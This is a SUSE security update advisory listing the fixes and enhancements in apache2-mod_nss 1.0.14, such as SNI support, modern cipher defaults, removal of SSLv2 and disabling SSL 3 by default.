SUSE-SU-2016:2329-1

Описание

This update provides apache2-mod_nss 1.0.14, which brings several fixes and enhancements:

• SHA256 cipher names change spelling from *_sha256 to *_sha_256.
• Drop mod_nss_migrate.pl and use upstream migrate script instead.
• Check for Apache user owner/group read permissions of NSS database at startup.
• Update default ciphers to something more modern and secure.
• Check for host and netstat commands in gencert before trying to use them.
• Don't ignore NSSProtocol when NSSFIPS is enabled.
• Use proper shell syntax to avoid creating /0 in gencert.
• Add server support for DHE ciphers.
• Extract SAN from server/client certificates into env.
• Fix memory leaks and other coding issues caught by clang analyzer.
• Add support for Server Name Indication (SNI)
• Add support for SNI for reverse proxy connections.
• Add RenegBufferSize? option.
• Add support for TLS Session Tickets (RFC 5077).
• Implement a slew more OpenSSL cipher macros.
• Fix a number of illegal memory accesses and memory leaks.
• Support for SHA384 ciphers if they are available in the version of NSS mod_nss is built against.
• Add the SECURE_RENEG environment variable.
• Add some hints when NSS database cannot be initialized.
• Code cleanup including trailing whitespace and compiler warnings.
• Modernize autotools configuration slightly, add config.h.
• Add small test suite for SNI.
• Add compatibility for mod_ssl-style cipher definitions.
• Add Camelia ciphers.
• Remove Fortezza ciphers.
• Add TLSv1.2-specific ciphers.
• Initialize cipher list when re-negotiating handshake.
• Completely remove support for SSLv2.
• Add support for sqlite NSS databases.
• Compare subject CN and VS hostname during server start up.
• Add support for enabling TLS v1.2.
• Don't enable SSL 3 by default. (CVE-2014-3566)
• Improve protocol testing.
• Add nss_pcache man page.
• Fix argument handling in nss_pcache.
• Support httpd 2.4+.
• Allow users to configure a helper to ask for certificate passphrases via NSSPassPhraseDialog. (bsc#975394)